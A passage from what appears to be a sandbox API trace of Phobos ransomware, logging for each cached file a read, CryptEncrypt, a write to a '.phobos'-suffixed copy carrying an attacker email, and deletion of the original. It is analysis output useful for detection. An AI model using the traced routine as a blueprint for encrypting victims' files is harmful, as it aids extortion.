dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.276] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=463) returned 1 [0196.276] CloseHandle (hObject=0x124) returned 1 [0196.276] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4")) returned 0x2024 [0196.276] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.276] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.276] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.277] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.277] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0196.277] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa327e8) returned 1 [0196.277] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.277] ReadFile (in: hFile=0x124, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1cf, lpOverlapped=0x0) returned 1 [0196.278] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1d0, dwBufLen=0x1d0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1d0) returned 1 [0196.279] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1d0, lpOverlapped=0x0) returned 1 [0196.280] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0196.280] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.280] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0196.280] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.280] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0196.280] CryptDestroyKey (hKey=0xa327e8) returned 1 [0196.280] CloseHandle (hObject=0x124) returned 1 [0196.280] CloseHandle (hObject=0x194) returned 1 [0196.280] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4")) returned 1 [0196.281] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0196.281] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0196.282] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=463) returned 1 [0196.282] CloseHandle (hObject=0x194) returned 1 [0196.282] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778")) returned 0x2024 [0196.282] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0196.282] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.282] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.283] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.283] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa327e8) returned 1 [0196.283] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.283] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1cf, lpOverlapped=0x0) returned 1 [0196.284] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1d0, dwBufLen=0x1d0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1d0) returned 1 [0196.284] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1d0, lpOverlapped=0x0) returned 1 [0196.285] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0196.285] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.285] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0196.285] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.285] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0196.286] CryptDestroyKey (hKey=0xa327e8) returned 1 [0196.286] CloseHandle (hObject=0x194) returned 1 [0196.286] CloseHandle (hObject=0x124) returned 1 [0196.286] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778")) returned 1 [0196.287] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0196.287] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.287] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=463) returned 1 [0196.287] CloseHandle (hObject=0x124) returned 1 [0196.288] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed")) returned 0x2024 [0196.288] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.288] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.288] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.288] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.288] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0196.289] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa327e8) returned 1 [0196.289] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.289] ReadFile (in: hFile=0x124, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1cf, lpOverlapped=0x0) returned 1 [0196.289] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1d0, dwBufLen=0x1d0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1d0) returned 1 [0196.289] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1d0, lpOverlapped=0x0) returned 1 [0196.290] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0196.290] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.290] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0196.290] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.290] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0196.290] CryptDestroyKey (hKey=0xa327e8) returned 1 [0196.290] CloseHandle (hObject=0x124) returned 1 [0196.290] CloseHandle (hObject=0x194) returned 1 [0196.291] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed")) returned 1 [0196.291] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0196.291] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0196.292] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=463) returned 1 [0196.292] CloseHandle (hObject=0x194) returned 1 [0196.292] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e")) returned 0x2024 [0196.292] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0196.292] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.292] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.293] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa327e8) returned 1 [0196.293] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.293] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1cf, lpOverlapped=0x0) returned 1 [0196.294] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1d0, dwBufLen=0x1d0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1d0) returned 1 [0196.294] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1d0, lpOverlapped=0x0) returned 1 [0196.294] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0196.294] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.294] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0196.294] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.294] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0196.295] CryptDestroyKey (hKey=0xa327e8) returned 1 [0196.295] CloseHandle (hObject=0x194) returned 1 [0196.295] CloseHandle (hObject=0x124) returned 1 [0196.295] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e")) returned 1 [0196.295] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0196.296] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.296] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=463) returned 1 [0196.296] CloseHandle (hObject=0x124) returned 1 [0196.296] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30")) returned 0x2024 [0196.296] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.296] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.296] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.296] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, 